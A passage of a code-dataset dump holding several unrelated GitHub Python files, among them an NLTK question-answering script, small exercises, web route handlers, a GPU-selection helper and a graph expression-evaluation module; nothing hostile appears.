stop_words:\r\n filtered_sentence.append(w)\r\n temp = temp + w +\" \"\r\n\r\n #print(temp)\r\n file.write(temp)\r\n file.close()\r\n \r\n \r\n \r\ndef two():\r\n file = open('Text_Without_Stopwords.txt','r') \r\n text = file.read()\r\n file.close()\r\n lemmatizer = WordNetLemmatizer()\r\n\r\n stop_words = set(stopwords.words('english'))\r\n sent_text = nltk.sent_tokenize(text)\r\n file = open('Text_Lemmatized.txt','w') \r\n for sentence in sent_text:\r\n tokenized_text = nltk.word_tokenize(sentence)\r\n filtered_sentence = [w for w in tokenized_text if not w in stop_words]\r\n #filtered_sentence = []\r\n temp=\"\"\r\n tokenized_text = nltk.word_tokenize(sentence)\r\n for w in tokenized_text:\r\n #filtered_sentence.append(w)\r\n temp = temp + lemmatizer.lemmatize(w) +\" \"\r\n file.write(temp)\r\n file.close()\r\n \r\n\r\ndef three():\r\n file = open('Text_Lemmatized.txt','r') \r\n text = file.read()\r\n file.close()\r\n word_list = text.split()\r\n word_list = [word.replace(\".\", \"\") for word in word_list]\r\n word_list = [word.replace(\",\", \"\") for word in word_list]\r\n file = open ('Text_Unique_Words.txt', 'w')\r\n #print(word_list)\r\n unique_words = set(word_list)\r\n #print(unique_words)\r\n for word in unique_words:\r\n file.write(str(word)+\" \")\r\n file.close()\r\n \r\n \r\ndef four():\r\n file = open('Text_Unique_Words.txt','r') \r\n text = file.read()\r\n file.close()\r\n wordlist = text.split()\r\n file = open('Text_to_Vector.txt','w') \r\n \r\n file1 = open('Text_Lemmatized.txt','r') \r\n text = file1.read()\r\n file1.close()\r\n sent_text = nltk.sent_tokenize(text)\r\n file.write(str(wordlist) + '\\n')\r\n for sentence in sent_text:\r\n tokenized_text = nltk.word_tokenize(sentence)\r\n wordfreq = []\r\n for w in wordlist:\r\n wordfreq.append(sentence.count(w))\r\n\r\n file.write(str(wordfreq) + '\\n')\r\n file.close()\r\n\r\n # Read in the file\r\n with open('Text_to_Vector.txt', 'r') as file :\r\n filedata = file.read()\r\n file.close()\r\n \r\n # Replace the target string\r\n filedata = filedata.replace('[', '')\r\n filedata = filedata.replace(']', '')\r\n \r\n # Write the file out again\r\n with open('Text_to_Vector.txt', 'w') as file:\r\n file.write(filedata)\r\n file.close()\r\n\r\n\r\ndef five():\r\n with open('Text_to_Vector.txt', 'r') as in_file:\r\n stripped = (line.strip() for line in in_file)\r\n\r\n lines = (line.split(\",\") for line in stripped if line)\r\n with open('WordVectortest.csv', 'w') as out_file:\r\n writer = csv.writer(out_file)\r\n #writer.writerow(('title', 'intro'))\r\n writer.writerows(lines)\r\n \r\none()\r\ntwo()\r\nthree()\r\nfour()\r\nfive()\r\n \r\n\r\ntestset = pd.read_csv('WordVectortest.csv')\r\ntestsetval = list(testset)\r\n#print(testsetval)\r\n\r\nfor i in range(len(testsetval)):\r\n testsetval[i] = testsetval[i].lower()\r\n if ' ' in testsetval[i]:\r\n testsetval[i] = testsetval[i].replace(' ','')\r\n \r\n\r\n\r\ndataset = pd.read_csv('WordVector.csv')\r\ndatasetval = list(dataset)\r\n#print(datasetval)\r\n\r\n\r\nfor i in range(len(datasetval)):\r\n datasetval[i] = datasetval[i].lower()\r\n if ' ' in datasetval[i]:\r\n datasetval[i] = datasetval[i].replace(' ','')\r\n \r\n \r\n \r\n \r\n\r\ncount = []\r\nfor k in range(len(dataset)):\r\n myset = dataset.iloc[k]\r\n c = 0\r\n for i in range(len(testsetval)):\r\n if myset[datasetval.index(testsetval[i])]==1:\r\n c = c + 1\r\n count.append(c)\r\n \r\n\r\n#print(count.index(max(count)))\r\n\r\n\r\nmyfile = open('passage.txt','r')\r\n\r\ndata = myfile.read()\r\n\r\nmydata = data.split('.')\r\nans=mydata[count.index(max(count))]\r\n\r\nmyfile.close()\r\nprint(ans)\r\nfrom gtts import gTTS\r\ntts = gTTS(text=ans, lang='en')\r\ntts.save('ans2.mp3')\r\nimport pygame\r\npygame.init()\r\npygame.mixer.music.load(\"ans2.mp3\")\r\npygame.mixer.music.play()\r\n'''from playsound import playsound\r\nplaysound('ans2.mp3')'''","repo_name":"bhanu-prakash3/Question-Answering-System","sub_path":"new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":6696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"828436883","text":"#descripcion: programa donde se le pregunte al usuario por un numero e imprima los divisores de ese numero\n#entrada: preguntar al usuario por un numero \n#salida: numero divisores de el numero dado por el usuario\n#autor: mvillalobos\n#fecha :12/07/2017\n#version:2.0\n#plataforma: python v2.7\n\nx = int(input(\"ingrese numero:\"))\nfor i in range(1,x + 1):\n if x%i==0:\n print(i)\n","repo_name":"mvillalobos712/ejercicios_python","sub_path":"ejercicios_python5.1.py","file_name":"ejercicios_python5.1.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"19702006885","text":"from matplotlib import *\nfrom numpy import *\nfrom scipy import *\nfrom pandas import *\n\nmainMenuPrint: str = \"Main Menu: \\n[1] New Data \\n[2] Open Data \\n[3] Save Data \\n[4] View Data \\n[5] Edit Data \\n[6]\" \\\n \" Show Save File Path \\n[7] Check Concordant Results \\n[8] Average Data\\n[9] Plot Graph\"\nfirstStart: bool = True\nanyData: bool = False\ndataSaved: bool = False\nyesNo = ''\nseeData = ''\nDataFile: str = ''\n\ndef firstTime():\n global firstStart\n while firstStart == True:\n print('Welcome to SciLabs, this is an interface to help with data analysis for sciences \\nPlease remmeber to enter the value shown in the [], but without the surrounding []')\n firstStart = False\n\ndef saveYesNo():\n global yesNo\n while yesNo not in ('Y', 'N'):\n yesNo = input('Do you want to save: \\n[Y]es \\n[N]o:\\n')\n if yesNo == 'Y':\n saveData()\n break\n elif yesNo == 'N':\n pass\n break\n else:\n errorOut(1)\n\ndef openData():\n global seeData\n global dataSaved\n global path\n global DataFile\n if dataSaved == False:\n print('Current Data is not saved')\n saveYesNo()\n else:\n pass\n path = str(input('Enter file path \\nShould be a .txt file in current directory where this program is running from:\\n'))\n DataFile = open(path, 'r+')\n\n while seeData not in ('Y', 'N'):\n seeData = str(input('Do you want to see your data: \\n[Y]es \\n[N]o: \\n'))\n if seeData == 'Y':\n viewData()\n elif seeData == 'N':\n pass\n else:\n errorOut(1)\n\n\ndef errorOut(state):\n print('There has been an error:')\n if state == 1:\n print('Input not recognised, please try again\\n')\n elif state == 2:\n print('No data present, please create data\\n')\n else:\n print('Big problem: Error not known!\\n')\n\n\ndef mainMenu():\n firstTime()\n\n print(mainMenuPrint)\n menuInput: int = int(input('Enter option:'))\n\n if menuInput == 2:\n openData()\n elif menuInput == 3:\n saveData()\n elif menuInput == 4:\n viewData()\n elif menuInput == 5:\n editData()\n elif menuInput == 6:\n fileLoc()\n elif menuInput == 7:\n checkConcord()\n elif menuInput == 8:\n averageData()\n elif menuInput == 9:\n plotGraph()\n elif menuInput == 1:\n newData()\n else:\n errorOut(1)\n\n\nwhile True:\n mainMenu()\n","repo_name":"thomasholland123/SDAK","sub_path":"sdak.py","file_name":"sdak.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"74893744998","text":"from django.conf.urls import url\nfrom kompany import views\n\nurlpatterns = [\n url(r'^$', views.home_page, name='home'),\n url(r'^search/$', views.search, name='search'),\n url(r'^product/(?P[-\\w]+)/$', views.product_page, name='product_page'),\n url(r'^(?P[a-z]+)/(?P[-\\w]+)/$', views.category_view, name='product_list'),\n url(r'^(?P[-\\w]+)/$', views.category_view, name='product_list'),\n]\n","repo_name":"iamvinitk/Online-Retail","sub_path":"kompany/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"18"}
+{"seq_id":"5554043440","text":"import os\nimport random\nimport string\nfrom enum import Enum\n\nfrom fastapi import APIRouter, UploadFile, File, Depends\nfrom pdfminer.pdfparser import PDFSyntaxError\nfrom starlette.responses import JSONResponse\n\nfrom app.db.crud import CrudDatabase\nfrom app.utils.pdfparser import shop_parse_pdf, user_parse_pdf\nfrom app.utils.pdfsaver import chunked_copy, generate_path_file\n\nfile_router = APIRouter()\n\n\nclass ParseEnum(str, Enum):\n SHOP = \"shop\"\n USER = \"user\"\n\n\n@file_router.post(\"/upload/document\")\nasync def parse_pdf(document_type: ParseEnum, file: UploadFile = File(...)):\n exception = JSONResponse(\n status_code=400,\n content={\n \"content\": \"An error occurred while trying to disband the document,\"\n \" please try again later.\"\n }\n )\n\n if document_type == ParseEnum.SHOP:\n try:\n result = shop_parse_pdf(path=file.file)\n return result\n except ValueError:\n return exception\n\n if document_type == ParseEnum.USER:\n try:\n result = user_parse_pdf(path=file.file)\n return result\n except ValueError:\n return exception\n\n\n","repo_name":"SilentSt/AnoFoodsharingREST","sub_path":"app/routes/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"4788275670","text":"\nimport tkinter as tk\n\nframe = tk.Tk()\nframe.title(\"Text counter\")\nframe.geometry('400x200')\n\n \ndef printInput():\n inp = inputtxt.get(1.0, \"end-1c\")\n lbl.config(text = \"Words \"+str(len(inp.split())))\n\ndef letterInput():\n inp = inputtxt.get(1.0, \"end-1c\")\n lbl.config(text = \"Characters \"+str(len(inp)))\n \n\ninputtxt = tk.Text(frame, height = 5, width = 20)\n \ninputtxt.pack()\n \n\nprintButton = tk.Button(frame,text = \"Check how many words are there:\", command = printInput)\nprintButton.pack()\nletterButton = tk.Button(frame,text =\"check how many letters are there:\",command = letterInput)\nletterButton.pack()\n\nlbl = tk.Label(frame, text = \"\")\nlbl.pack()\nframe.mainloop()\n","repo_name":"DhruvaNaik/words-and-letter-counter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"15528695253","text":"from subprocess import Popen, PIPE\nimport torch\n\ndef get_first_free_gpu():\n if torch.cuda.is_available():\n gpu_output = Popen([\"nvidia-smi\", \"-q\", \"-d\", \"PIDS\"], stdout=PIPE, encoding=\"utf-8\")\n gpu_processes = Popen([\"grep\", \"Processes\"], stdin=gpu_output.stdout, stdout=PIPE, encoding=\"utf-8\")\n gpu_output.stdout.close()\n processes_output = gpu_processes.communicate()[0]\n for i, line in enumerate(processes_output.strip().split(\"\\n\")):\n if line.endswith(\"None\"):\n print(f\"Found Free GPU ID: {i}\")\n cuda_device = f\"cuda:{i}\"\n torch.cuda.set_device(cuda_device)\n return torch.device(cuda_device)\n print(\"WARN - No Free GPU found! Running on CPU instead...\")\n return torch.device(\"cpu\")\n","repo_name":"technion-nlp-lab/utils","sub_path":"get_first_free_gpu.py","file_name":"get_first_free_gpu.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"75087281641","text":"from tornado import web, ioloop, httpserver\nfrom handlers import BaseHandler\nfrom models import user_mod, log_mod\nfrom lib import alg_list\nimport tornado\n\n\nclass AlgShowHandler(BaseHandler.BaseHandler):\n @tornado.web.authenticated\n def get(self):\n username = tornado.escape.json_decode(self.current_user)\n usermod = user_mod.UserModel()\n userinfo = usermod.find_user(username)\n curid = self.get_argument('algid')\n\n strh = str(userinfo['haveseen'])\n print(strh)\n if strh == 'None':\n strh = curid\n else:\n haveseen = userinfo['haveseen'].split(' ')\n if curid not in haveseen:\n strh += ' ' + curid\n\n usermod.update_user_haveseen(userinfo['id'], strh)\n usermod.update_user_lastseen(userinfo['id'], curid)\n self.render(\n 'algorithm.html',\n alg_list=alg_list.alg,\n username=username,\n curid=curid,\n )\n","repo_name":"acptek/VisualPanel","sub_path":"handlers/AlgorithmShow.py","file_name":"AlgorithmShow.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"33578535977","text":"from __future__ import print_function\nimport sys\nimport os\nimport re\nimport inspect\nimport six\nfrom AssimCtypes import ADDR_FAMILY_IPV4, ADDR_FAMILY_IPV6\nfrom AssimCclasses import pyNetAddr, pyConfigContext\n\n#\n#\nclass GraphNodeExpression(object):\n \"\"\"We implement Graph node expressions - we are't a real class\"\"\"\n\n functions = {}\n\n def __init__(self):\n raise NotImplementedError(\"This is not a real class\")\n\n @staticmethod\n def evaluate(expression, context):\n \"\"\"\n Evaluate an expression.\n It can be:\n None - return None\n 'some-value -- return some-value (it's a constant)\n or an expression to find in values or graphnodes\n or @functionname(args) - for defined functions...\n\n We may add other kinds of expressions in the future...\n \"\"\"\n if not isinstance(expression, six.string_types):\n # print('RETURNING NONSTRING:', expression, file=sys.stderr)\n return expression\n expression = str(expression.strip())\n if not hasattr(context, \"get\") or not hasattr(context, \"__setitem__\"):\n context = ExpressionContext(context)\n # print('''EVALUATE('%s') (%s):''' % (expression, type(expression))\n # The value of this parameter is a constant...\n if expression.startswith('\"'):\n if expression[-1] != '\"':\n print(\"unquoted constant string '%s'\" % expression, file=sys.stderr)\n # print('''Constant string: \"%s\"''' % (expression[1:-1]), file=sys.stderr)\n return expression[1:-1] if expression[-1] == '\"' else None\n if (expression.startswith(\"0x\") or expression.startswith(\"0X\")) and len(expression) > 3:\n return int(expression[2:], 16)\n if expression.isdigit():\n return int(expression, 8) if expression.startswith(\"0\") else int(expression)\n if expression.find(\"(\") >= 0:\n value = GraphNodeExpression.functioncall(expression, context)\n context[expression] = value\n return value\n # if expression.startswith('$'):\n # print('RETURNING VALUE OF %s' % expression[1:], file=sys.stderr)\n # print('Context is %s' % str(context), file=sys.stderr)\n # print('RETURNING VALUE OF %s = %s'\\, file=sys.stderr)\n # % (expression, context.get(expression[1:], None))\n value = context.get(expression[1:], None) if expression.startswith(\"$\") else expression\n return value\n\n # pylint R0912: too many branches - really ought to write a lexical analyzer and parser\n # On the whole it would be simpler and easier to understand...\n # pylint: disable=R0912\n @staticmethod\n def _compute_function_args(arglist, context):\n \"\"\"Compute the arguments to a function call. May contain function calls\n and other GraphNodeExpression, or quoted strings...\n Ugly lexical analysis.\n Really ought to write a real recursive descent parser...\n \"\"\"\n # print('_compute_function_args(%s)' % str(arglist), file=sys.stderr)\n args = []\n argstrings = []\n nestcount = 0\n arg = \"\"\n instring = False\n prevwasquoted = False\n for char in arglist:\n if instring:\n if char == '\"':\n instring = False\n prevwasquoted = True\n else:\n arg += char\n elif nestcount == 0 and char == '\"':\n instring = True\n elif nestcount == 0 and char == \",\":\n if prevwasquoted:\n prevwasquoted = False\n args.append(arg)\n argstrings.append(arg)\n else:\n arg = arg.strip()\n if arg == \"\":\n continue\n # print(\"EVALUATING [%s]\" % arg, file=sys.stderr)\n args.append(GraphNodeExpression.evaluate(arg, context))\n argstrings.append(arg)\n arg = \"\"\n elif char == \"(\":\n nestcount += 1\n # print(\"++nesting: %d\" % (nestcount), file=sys.stderr)\n arg += char\n elif char == \")\":\n arg += char\n nestcount -= 1\n # print(\"--nesting: %d\" % (nestcount), file=sys.stderr)\n if nestcount < 0:\n return (None, None)\n if nestcount == 0:\n if prevwasquoted:\n # print('_compute_function_args: QUOTED argument: \"%s\"' % arg, file=sys.stderr)\n args.append(arg)\n else:\n arg = arg.strip()\n # print(\"GnE.functioncall [%s]\" % arg, file=sys.stderr)\n args.append(GraphNodeExpression.functioncall(arg, context))\n argstrings.append(arg)\n arg = \"\"\n else:\n arg += char\n if nestcount > 0 or instring:\n # print(\"Nestcount: %d, instring: %s\" % (nestcount, instring), file=sys.stderr)\n return (None, None)\n if arg != \"\":\n if prevwasquoted:\n # print('_compute_function_args: quoted argument: \"%s\"' % arg, file=sys.stderr)\n args.append(arg)\n else:\n # print(\"GnE.evaluate [%s]\" % arg, file=sys.stderr)\n args.append(GraphNodeExpression.evaluate(arg, context))\n argstrings.append(arg)\n # print('RETURNING [%s] [%s]' % (args, argstrings), file=sys.stderr)\n return (args, argstrings)\n\n @staticmethod\n def functioncall(expression, context):\n \"\"\"Performs a function call for our expression language\n\n Figures out the function name, and the arguments and then\n calls that function with those arguments.\n\n All our defined functions take an argv argument string first, then an\n ExpressionContext argument.\n\n This parsing is incredibly primitive. Feel free to improve it ;-)\n\n \"\"\"\n expression = expression.strip()\n if expression[-1] != \")\":\n print(\"%s does not end in )\" % expression, file=sys.stderr)\n return None\n expression = expression[: len(expression) - 1]\n (funname, arglist) = expression.split(\"(\", 1)\n # print('FUNCTIONCALL: %s(%s)' % (funname, arglist), file=sys.stderr)\n funname = funname.strip()\n arglist = arglist.strip()\n #\n # At this point we have all our arguments as a string , but it might contain\n # other (nested) calls for us to evaluate\n #\n # print('FunctionCall: arglist: [%s]' % (arglist), file=sys.stderr)\n args, _argstrings = GraphNodeExpression._compute_function_args(arglist, context)\n # print('args: %s' % (args), file=sys.stderr)\n # print('_argstrings: %s' % (_argstrings), file=sys.stderr)\n if args is None:\n return None\n\n if funname.startswith(\"@\"):\n funname = funname[1:]\n if funname not in GraphNodeExpression.functions:\n print(\"BAD FUNCTION NAME: %s\" % funname, file=sys.stderr)\n return None\n # print('ARGSTRINGS %s(%s)' % (funname, str(_argstrings)), file=sys.stderr)\n # print('ARGS: %s' % (str(args)), file=sys.stderr)\n ret = GraphNodeExpression.functions[funname](args, context)\n # print('%s(%s) => %s' % (funname, args, ret), file=sys.stderr)\n return ret\n\n @staticmethod\n def FunctionDescriptions():\n \"\"\"Return a list of tuples of (funcname, docstring) for all our GraphNodeExpression\n defined functions. The list is sorted by function name.\n \"\"\"\n names = sorted(GraphNodeExpression.functions.keys())\n ret = []\n for name in names:\n ret.append((name, inspect.getdoc(GraphNodeExpression.functions[name])))\n return ret\n\n @staticmethod\n def RegisterFun(function):\n \"Function to register other functions as built-in GraphNodeExpression functions\"\n GraphNodeExpression.functions[function.__name__] = function\n return function\n\n\nclass ExpressionContext(object):\n \"\"\"This class defines a context for an expression evaluation.\n There are three parts to it:\n 1) A cache of values which have already been computed\n 2) A scope/context for expression evaluation - a default name prefix\n 3) A set of objects which implement the 'get' operation to be used in\n evaluating values of names\n\n We act like a dict, implementing these member functions:\n __iter__, __contains__, __len__, __getitem__ __setitem__, __delitem__,\n get, keys, has_key, clear, items\n \"\"\"\n\n def __init__(self, objects, prefix=None):\n \"Initialize our ExpressionContext\"\n self.objects = objects if isinstance(objects, (list, tuple)) else (objects,)\n self.prefix = prefix\n self.values = {}\n\n def __str__(self):\n ret = \"ExpressionContext(\"\n delim = \"[\"\n for obj in self.objects:\n ret += \"%s%s\" % (delim, str(obj))\n delim = \", \"\n ret += \"])\"\n return ret\n\n def keys(self):\n \"\"\"Return the complete set of keys in all our constituent objects\"\"\"\n retkeys = set()\n for obj in self.objects:\n for key in obj:\n retkeys.add(key)\n return retkeys\n\n @staticmethod\n def _fixvalue(v):\n \"Fix up a return value to avoid unicode values...\"\n return v\n if not isinstance(v, str) and hasattr(v, \"__iter__\") and not hasattr(v, \"__getitem__\"):\n ret = []\n for item in v:\n ret.append(ExpressionContext._fixvalue(item))\n return ret\n return v\n\n def get(self, key, alternative=None):\n \"\"\"Return the value associated with a key - cached or otherwise\n and cache it.\"\"\"\n if key in self.values:\n return self.values[key]\n for obj in self.objects:\n ret = None\n try:\n # print('GETTING %s in %s: %s' % (key, type(obj), obj), file=sys.stderr)\n ret = obj.get(key, None)\n if ret is None and hasattr(obj, \"deepget\"):\n ret = obj.deepget(key, None)\n # print('RETURNED %s' % ret, file=sys.stderr)\n # Too general exception catching...\n # pylint: disable=W0703\n except Exception as e:\n ret = None\n print(\"OOPS: self.objects = %s / exception %s\" % (str(self.objects), e), sys.stderr)\n print(\"OOPS: OUR object = %s (%s)\" % (str(obj), type(obj)), file=sys.stderr)\n ret = ExpressionContext._fixvalue(ret)\n if ret is not None:\n self.values[key] = ret\n return ret\n if self.prefix is not None:\n ret = ExpressionContext._fixvalue(obj.get(\"%s.%s\" % (self.prefix, key), None))\n if ret is not None:\n self.values[key] = ret\n return ret\n return alternative\n\n def clear(self):\n \"Clear our cached values\"\n self.values = {}\n\n def items(self):\n \"Return all items from our cache\"\n return self.values.items()\n\n def __iter__(self):\n \"Yield each key from self.keys() in turn\"\n for key in self.keys():\n yield key\n\n def __contains__(self, key):\n \"Return True if we can get() this key\"\n return self.get(key, None) is not None\n\n def has_key(self, key):\n \"Return True if we can get() this key\"\n return self.get(key, None) is not None\n\n def __len__(self):\n \"Return the number of keys in our objects\"\n return len(self.keys())\n\n def __getitem__(self, key):\n \"Return the given item, or raise KeyError if not found\"\n ret = self.get(key, None)\n if ret is None:\n raise KeyError(key)\n return ret\n\n def __setitem__(self, key, value):\n \"Cache the value associated with this key\"\n self.values[key] = value\n\n def __delitem__(self, key):\n \"Remove the cache value associated with this key\"\n del self.values[key]\n\n\n@GraphNodeExpression.RegisterFun\ndef IGNORE(_ignoreargs, _ignorecontext):\n \"\"\"Function to ignore its argument(s) and return True all the time.\n This is a special kind of no-op in that it is used to override\n and ignore an underlying rule. It is expected that its arguments\n will explain why it is being ignored in this rule set.\n \"\"\"\n return True\n\n\n@GraphNodeExpression.RegisterFun\ndef EQ(args, _context):\n \"\"\"Function to return True if each non-None argument in the list matches\n every non-None argument and at least one of its subsequent arguments are not None.\n \"\"\"\n # print('EQ(%s) =>?' % str(args), file=sys.stderr)\n val0 = args[0]\n if val0 is None:\n return None\n anymatch = None\n for val in args[1:]:\n if val is None:\n continue\n if not isinstance(val, type(val0)):\n if str(val0) != str(val):\n return False\n elif val0 != val:\n return False\n anymatch = True\n # print('EQ(%s) => %s' % (str(args), str(anymatch)), file=sys.stderr)\n return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef NE(args, _context):\n \"\"\"Function to return True if no non-None argument in the list matches\n the first one or None if all subsequent arguments are None\"\"\"\n # print('NE(%s, %s)' % (args[0], str(args[1:])), file=sys.stderr)\n val0 = args[0]\n if val0 is None:\n return None\n anymatch = None\n for val in args[1:]:\n # print('+NE(%s, %s) (%s, %s)' % (val0, val, type(val0), type(val)), file=sys.stderr)\n if val is None:\n return None\n if val0 == val or str(val0) == str(val):\n return False\n anymatch = True\n return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef LT(args, _context):\n \"\"\"Function to return True if each non-None argument in the list is\n less than the first one or None if all subsequent arguments are None\"\"\"\n val0 = args[0]\n if val0 is None:\n return None\n anymatch = None\n for val in args[1:]:\n if val is None:\n continue\n if val0 >= val:\n return False\n anymatch = True\n return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef GT(args, _context):\n \"\"\"Function to return True if each non-None argument in the list is\n greater than the first one or None if all subsequent arguments are None\"\"\"\n val0 = args[0]\n if val0 is None:\n return None\n anymatch = None\n for val in args[1:]:\n if val is None:\n continue\n if val0 <= val:\n return False\n anymatch = True\n return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef LE(args, _context):\n \"\"\"Function to return True if each non-None argument in the list is\n less than or equal to first one or None if all subsequent arguments are None\"\"\"\n val0 = args[0]\n if val0 is None:\n return None\n anymatch = None\n for val in args[1:]:\n if val is None:\n continue\n if val0 > val:\n return False\n anymatch = True\n return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef GE(args, _context):\n \"\"\"Function to return True if each non-None argument in the list is\n greater than or equal to first one or None if all subsequent arguments are None\"\"\"\n val0 = args[0]\n if val0 is None:\n return None\n anymatch = None\n for val in args[1:]:\n if val is None:\n continue\n if val0 < val:\n return False\n anymatch = True\n return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef IN(args, _context):\n \"\"\"Function to return True if first argument is in the list that follows.\n If the first argument is iterable, then each element in it must be 'in'\n the list that follows.\n \"\"\"\n\n val0 = args[0]\n if val0 is None:\n return None\n if hasattr(val0, \"__iter__\") and not isinstance(val0, six.string_types):\n # Iterable\n anyTrue = False\n for elem in val0:\n if elem is None:\n continue\n if elem not in args[1:] and str(elem) not in args[1:]:\n return False\n anyTrue = True\n return True if anyTrue else None\n # Not an iterable: string, int, NoneType, etc.\n if val0 is None:\n return None\n # print(type(val0), val0, type(args[1]), args[1], file=sys.stderr)\n return val0 in args[1:] or str(val0) in args[1:]\n\n\n@GraphNodeExpression.RegisterFun\ndef NOTIN(args, _context):\n \"Function to return True if first argument is NOT in the list that follows\"\n val0 = args[0]\n if val0 is None:\n return None\n if hasattr(val0, \"__iter__\") and not isinstance(val0, six.string_types):\n # Iterable\n for elem in val0:\n if elem in args[1:] or str(elem) in args[1:]:\n return False\n return True\n return val0 not in args[1:] and str(val0) not in args[1:]\n\n\n@GraphNodeExpression.RegisterFun\ndef NOT(args, _context):\n \"Function to Negate the Truth value of its single argument\"\n try:\n val0 = args[0]\n except TypeError:\n val0 = args\n return None if val0 is None else not val0\n\n\ndef _str_to_regexflags(s):\n r\"\"\"Transform a string of single character regex flags to the corresponding integer.\n Note that the flag names are all the Python single character flag names from the 're' module.\n They are as follows:\n A perform 8-bit ASCII-only matching (Python 3 only)\n I Perform non-case-sensitive matching\n L Use locale settings for \\w, =W, \\b and \\B\n M Multi-line match - allow ^ and $ to apply to individual lines in the string\n S Allow the dot character to also match a newline\n U Uses information from the Unicode character properties for \\w, \\W, \\b and \\B.\n (python 2 only)\n X Ignores unescaped whitespace and comments in the pattern string.\n \"\"\"\n\n flags = 0\n if s is not None:\n for char in s:\n if char == \"A\":\n if hasattr(re, \"ASCII\"):\n flags |= getattr(re, \"ASCII\")\n elif char == \"I\":\n flags |= re.IGNORECASE\n elif char == \"L\":\n flags |= re.LOCALE\n elif char == \"M\":\n flags |= re.MULTILINE\n elif char == \"S\":\n flags |= re.DOTALL\n elif char == \"U\":\n flags |= re.UNICODE\n elif char == \"X\":\n flags |= re.VERBOSE\n return flags\n\n\n_regex_cache = {}\n\n\ndef _compile_and_cache_regex(regexstr, flags=None):\n \"Compile and cache a regular expression with the given flags\"\n cache_key = \"%s//%s\" % (str(regexstr), str(flags))\n if cache_key in _regex_cache:\n regex = _regex_cache[cache_key]\n else:\n regex = re.compile(regexstr, _str_to_regexflags(flags))\n _regex_cache[cache_key] = regex\n return regex\n\n\n@GraphNodeExpression.RegisterFun\ndef match(args, _context):\n \"\"\"Function to return True if first argument matches the second argument (a regex)\n - optional 3rd argument is RE flags\"\"\"\n lhs = str(args[0])\n rhs = args[1]\n if lhs is None or rhs is None:\n return None\n flags = args[2] if len(args) > 2 else None\n regex = _compile_and_cache_regex(rhs, flags)\n return regex.search(lhs) is not None\n\n\n@GraphNodeExpression.RegisterFun\ndef argequals(args, context):\n \"\"\"\n usage: argequals name-to-search-for [list-to-search]\n\n A function which searches a list for an argument of the form name=value.\n The value '$argv' is the default name of the list to search.\n If there is a second argument, then that second argument is an expression\n expected to yield an iterable to search in for the name=value string instead of '$argv'\n \"\"\"\n # print('ARGEQUALS(%s)' % (str(args)), file=sys.stderr)\n if len(args) > 2 or len(args) < 1:\n return None\n definename = args[0]\n argname = args[1] if len(args) >= 2 else \"$argv\"\n listtosearch = GraphNodeExpression.evaluate(argname, context)\n # print('SEARCHING in %s FOR %s in %s' % (argname, definename, listtosearch), file=sys.stderr)\n if listtosearch is None:\n return None\n prefix = \"%s=\" % definename\n # W0702: No exception type specified for except statement\n # pylint: disable=W0702\n try:\n for elem in listtosearch:\n if elem.startswith(prefix):\n return elem[len(prefix) :]\n except: # No matter the cause of failure, return None...\n pass\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef argmatch(args, context):\n \"\"\"\n usage: argmatch regular-expression [list-to-search [regex-flags]]\n\n Argmatch searches a list for an value that matches a given regex.\n The regular expression is given by the argument in args, and the list 'argv'\n defaults to be the list of arguments to be searched.\n\n If there are two arguments in args, then the first argument is the\n array value to search in for the regular expression string instead of 'argv'\n\n If the regex contains a parenthesized groups, then the value of the first such group\n is returned, otherwise the part of the argument that matches the regex is returned.\n\n Note that this regular expression is 'anchored' that is, it starts with the first character\n in the argument. If you want it to be floating, then you may want to start your regex\n with '.*' and possibly parenthesize the part you want to return.\n \"\"\"\n # print('ARGMATCH(%s)' % (str(args)), file=sys.stderr)\n # print('ARGMATCHCONTEXT(%s)' % (str(context)), file=sys.stderr)\n if len(args) > 3 or len(args) < 1:\n return None\n regexstr = args[0]\n argname = args[1] if len(args) >= 2 else \"$argv\"\n flags = args[2] if len(args) >= 3 else None\n listtosearch = GraphNodeExpression.evaluate(argname, context)\n if listtosearch is None:\n return None\n\n # W0702: No exception type specified for except statement\n # pylint: disable=W0702\n try:\n # print(regex: /%s/' % regexstr, file=sys.stderr)\n regex = _compile_and_cache_regex(regexstr, flags)\n # print('Matching against list %s' % (str(listtosearch)), file=sys.stderr)\n for elem in listtosearch:\n # print('Matching %s against %s' % (regexstr, elem), file=sys.stderr)\n matchobj = regex.match(elem)\n if matchobj:\n # Did they specify any parenthesized groups?\n if len(matchobj.groups()) > 0:\n # yes - return the (first) parenthesized match\n return matchobj.groups()[0]\n else:\n # no - return everything matched\n return matchobj.group()\n except: # No matter the cause of failure, return None...\n # That includes ill-formed regular expressions...\n pass\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef flagvalue(args, context):\n \"\"\"\n usage: flagvalue flag-name [list-to-search]\n A function which searches a list for a -flag and returns\n the value of the string which is the next argument.\n The -flag is given by the argument in args, and the list 'argv'\n is assumed to be the list of arguments.\n If there are two arguments in args, then the first argument is the\n array value to search in for the -flag string instead of 'argv'\n The flag given must be the entire flag complete with - character.\n For example -X or --someflag.\n \"\"\"\n if len(args) > 2 or len(args) 